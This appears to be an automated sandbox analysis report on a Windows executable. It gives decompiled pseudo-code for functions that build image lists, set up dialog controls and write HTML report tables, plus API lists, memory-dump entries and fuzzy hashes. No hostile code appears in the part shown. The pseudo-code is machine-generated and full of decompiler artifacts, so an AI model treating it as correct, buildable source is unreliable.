                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                                                    • LoadImageW.USER32 ref: 004080B4
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                                                    • LoadImageW.USER32 ref: 004080D1
                                                                                                                    • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                                                    • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                                                    • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                                                    • DeleteObject.GDI32(?), ref: 00408121
                                                                                                                    • DeleteObject.GDI32(?), ref: 00408127
                                                                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 304928396-0
                                                                                                                    • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                    • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                                                    • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                    • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 69%
                                                                                                                    			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}













                                                                                                                    0x0040ae90
                                                                                                                    0x0040aeab
                                                                                                                    0x0040aeb2
                                                                                                                    0x0040aec0
                                                                                                                    0x0040aec7
                                                                                                                    0x0040aecc
                                                                                                                    0x0040aed3
                                                                                                                    0x0040aeda
                                                                                                                    0x0040aee1
                                                                                                                    0x0040aee1
                                                                                                                    0x0040aee7
                                                                                                                    0x0040aeea
                                                                                                                    0x0040aeed
                                                                                                                    0x0040aef9
                                                                                                                    0x0040aefe
                                                                                                                    0x0040af05
                                                                                                                    0x0040af07
                                                                                                                    0x0040af08
                                                                                                                    0x0040af13
                                                                                                                    0x0040af18
                                                                                                                    0x0040af19
                                                                                                                    0x0040af26
                                                                                                                    0x0040af2b
                                                                                                                    0x0040af2b
                                                                                                                    0x0040af2e
                                                                                                                    0x0040af34
                                                                                                                    0x0040af43
                                                                                                                    0x0040af44
                                                                                                                    0x0040af4f
                                                                                                                    0x0040af54
                                                                                                                    0x0040af55
                                                                                                                    0x0040af62
                                                                                                                    0x0040af67
                                                                                                                    0x0040af70
                                                                                                                    0x0040af76
                                                                                                                    0x0040af7a
                                                                                                                    0x0040af82
                                                                                                                    0x0040af88
                                                                                                                    0x0040af8d
                                                                                                                    0x0040af97
                                                                                                                    0x0040af9f
                                                                                                                    0x0040afa5
                                                                                                                    0x0040afa9
                                                                                                                    0x0040afb1
                                                                                                                    0x0040afb7
                                                                                                                    0x0040afbd

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                    • API String ID: 3143752011-1996832678
                                                                                                                    • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                    • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                                                    • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                    • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}
















                                                                                                                    0x00403c09
                                                                                                                    0x00403c0c
                                                                                                                    0x00403c11
                                                                                                                    0x00403c1b
                                                                                                                    0x00403c3f
                                                                                                                    0x00403c4a
                                                                                                                    0x00403c6e
                                                                                                                    0x00403c96
                                                                                                                    0x00403c9a
                                                                                                                    0x00403ca6
                                                                                                                    0x00403cb3
                                                                                                                    0x00403cb8
                                                                                                                    0x00403cc5
                                                                                                                    0x00403cca
                                                                                                                    0x00403cdd
                                                                                                                    0x00403ce6
                                                                                                                    0x00403cf8
                                                                                                                    0x00403d11
                                                                                                                    0x00403d26
                                                                                                                    0x00403d3f
                                                                                                                    0x00403d54
                                                                                                                    0x00403d6d
                                                                                                                    0x00403d76
                                                                                                                    0x00403d88
                                                                                                                    0x00403d9e
                                                                                                                    0x00403db0
                                                                                                                    0x00403db5
                                                                                                                    0x00403dc4
                                                                                                                    0x00403dc8
                                                                                                                    0x00403dc9
                                                                                                                    0x00403dca
                                                                                                                    0x00403dda
                                                                                                                    0x00403ddf
                                                                                                                    0x00403de2
                                                                                                                    0x00403de3
                                                                                                                    0x00403df4
                                                                                                                    0x00403df8
                                                                                                                    0x00403df9
                                                                                                                    0x00403dfa
                                                                                                                    0x00403e0a
                                                                                                                    0x00403e0f
                                                                                                                    0x00403e12
                                                                                                                    0x00403e13
                                                                                                                    0x00403e22
                                                                                                                    0x00403e26
                                                                                                                    0x00403e28
                                                                                                                    0x00403e29
                                                                                                                    0x00403e39
                                                                                                                    0x00403e3e
                                                                                                                    0x00403e41
                                                                                                                    0x00403e42
                                                                                                                    0x00403e51
                                                                                                                    0x00403e55
                                                                                                                    0x00403e57
                                                                                                                    0x00403e58
                                                                                                                    0x00403e68
                                                                                                                    0x00403e6d
                                                                                                                    0x00403e70
                                                                                                                    0x00403e71
                                                                                                                    0x00403e71
                                                                                                                    0x00403e87
                                                                                                                    0x00403e8d
                                                                                                                    0x00403e9e
                                                                                                                    0x00403ea6
                                                                                                                    0x00403eaf
                                                                                                                    0x00403ebc

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                                      • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                                      • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                      • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                                    • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                                    • GetDlgItem.USER32 ref: 00403C2F
                                                                                                                    • SetWindowLongW.USER32 ref: 00403C39
                                                                                                                      • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                                      • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                      • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                      • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                                                    • LoadImageW.USER32 ref: 00403C6A
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                                    • LoadImageW.USER32 ref: 00403C7F
                                                                                                                    • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                                    • GetDlgItem.USER32 ref: 00403CB0
                                                                                                                      • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                      • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                    • GetDlgItem.USER32 ref: 00403CC2
                                                                                                                    • GetDlgItem.USER32 ref: 00403CD4
                                                                                                                      • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                      • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                      • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                      • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                                      • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                                      • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                      • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                      • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                    • GetDlgItem.USER32 ref: 00403D64
                                                                                                                    • GetDlgItem.USER32 ref: 00403DC0
                                                                                                                    • GetDlgItem.USER32 ref: 00403DF0
                                                                                                                    • GetDlgItem.USER32 ref: 00403E20
                                                                                                                    • GetDlgItem.USER32 ref: 00403E4F
                                                                                                                    • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                                    • GetDlgItem.USER32 ref: 00403E9B
                                                                                                                    • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1038210931-0
                                                                                                                    • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                    • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                                                    • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                    • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 56%
                                                                                                                    			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}































                                                                                                                    0x00407763
                                                                                                                    0x0040776c
                                                                                                                    0x00407784
                                                                                                                    0x0040778b
                                                                                                                    0x00407797
                                                                                                                    0x00407799
                                                                                                                    0x0040779b
                                                                                                                    0x004077a7
                                                                                                                    0x004077ae
                                                                                                                    0x004077bd
                                                                                                                    0x004077c4
                                                                                                                    0x004077d3
                                                                                                                    0x004077da
                                                                                                                    0x004077e1
                                                                                                                    0x004077e6
                                                                                                                    0x004077f2
                                                                                                                    0x004077f5
                                                                                                                    0x00407804
                                                                                                                    0x00407805
                                                                                                                    0x00407810
                                                                                                                    0x00407812
                                                                                                                    0x00407813
                                                                                                                    0x00407818
                                                                                                                    0x00407818
                                                                                                                    0x00407825
                                                                                                                    0x0040782d
                                                                                                                    0x00407830
                                                                                                                    0x0040783a
                                                                                                                    0x00407840
                                                                                                                    0x00407846
                                                                                                                    0x00407849
                                                                                                                    0x00407850
                                                                                                                    0x0040785e
                                                                                                                    0x00407864
                                                                                                                    0x00407867
                                                                                                                    0x0040786b
                                                                                                                    0x0040786f
                                                                                                                    0x00407877
                                                                                                                    0x0040787a
                                                                                                                    0x00407885
                                                                                                                    0x00407892
                                                                                                                    0x004078a8
                                                                                                                    0x004078b8
                                                                                                                    0x004078c5
                                                                                                                    0x004078ff
                                                                                                                    0x004078c7
                                                                                                                    0x004078ca
                                                                                                                    0x004078dd
                                                                                                                    0x004078de
                                                                                                                    0x004078e3
                                                                                                                    0x004078e8
                                                                                                                    0x004078eb
                                                                                                                    0x004078f0
                                                                                                                    0x004078f0
                                                                                                                    0x00407906
                                                                                                                    0x00407909
                                                                                                                    0x0040790f
                                                                                                                    0x0040791d
                                                                                                                    0x00407923
                                                                                                                    0x0040792d
                                                                                                                    0x00407932
                                                                                                                    0x0040793b
                                                                                                                    0x00407942
                                                                                                                    0x00407943
                                                                                                                    0x0040794c
                                                                                                                    0x00407953
                                                                                                                    0x00407954
                                                                                                                    0x00407959
                                                                                                                    0x0040795c
                                                                                                                    0x00407961
                                                                                                                    0x0040796c
                                                                                                                    0x00407971
                                                                                                                    0x0040797a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00407838
                                                                                                                    0x00407838
                                                                                                                    0x0040783a
                                                                                                                    0x00407980
                                                                                                                    0x0040798a
                                                                                                                    0x004079a1

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                    • API String ID: 1607361635-601624466
                                                                                                                    • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                    • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                                                    • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                    • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 40%
                                                                                                                    			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}





















                                                                                                                    0x00407b65
                                                                                                                    0x00407b7c
                                                                                                                    0x00407b83
                                                                                                                    0x00407b91
                                                                                                                    0x00407b98
                                                                                                                    0x00407ba6
                                                                                                                    0x00407bad
                                                                                                                    0x00407bb2
                                                                                                                    0x00407bb9
                                                                                                                    0x00407bca
                                                                                                                    0x00407bcb
                                                                                                                    0x00407bd6
                                                                                                                    0x00407bdb
                                                                                                                    0x00407bdc
                                                                                                                    0x00407be1
                                                                                                                    0x00407be1
                                                                                                                    0x00407be8
                                                                                                                    0x00407bf9
                                                                                                                    0x00407bfa
                                                                                                                    0x00407c05
                                                                                                                    0x00407c0a
                                                                                                                    0x00407c0b
                                                                                                                    0x00407c1c
                                                                                                                    0x00407c21
                                                                                                                    0x00407c21
                                                                                                                    0x00407c2a
                                                                                                                    0x00407c2b
                                                                                                                    0x00407c36
                                                                                                                    0x00407c3b
                                                                                                                    0x00407c3c
                                                                                                                    0x00407c41
                                                                                                                    0x00407c51
                                                                                                                    0x00407c56
                                                                                                                    0x00407c5b
                                                                                                                    0x00407c65
                                                                                                                    0x00407c68
                                                                                                                    0x00407c6b
                                                                                                                    0x00407c74
                                                                                                                    0x00407c7b
                                                                                                                    0x00407c80
                                                                                                                    0x00407c82
                                                                                                                    0x00407c88
                                                                                                                    0x00407ca6
                                                                                                                    0x00407c8a
                                                                                                                    0x00407c8a
                                                                                                                    0x00407c8b
                                                                                                                    0x00407c96
                                                                                                                    0x00407c9b
                                                                                                                    0x00407c9c
                                                                                                                    0x00407ca1
                                                                                                                    0x00407ca1
                                                                                                                    0x00407cb3
                                                                                                                    0x00407cb4
                                                                                                                    0x00407cbd
                                                                                                                    0x00407cc4
                                                                                                                    0x00407cc5
                                                                                                                    0x00407cd0
                                                                                                                    0x00407cd5
                                                                                                                    0x00407cd6
                                                                                                                    0x00407cdb
                                                                                                                    0x00407ceb
                                                                                                                    0x00407cf0
                                                                                                                    0x00407cf3
                                                                                                                    0x00407cf3
                                                                                                                    0x00407cf3
                                                                                                                    0x00000000
                                                                                                                    0x00407cfc
                                                                                                                    0x00407d00

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
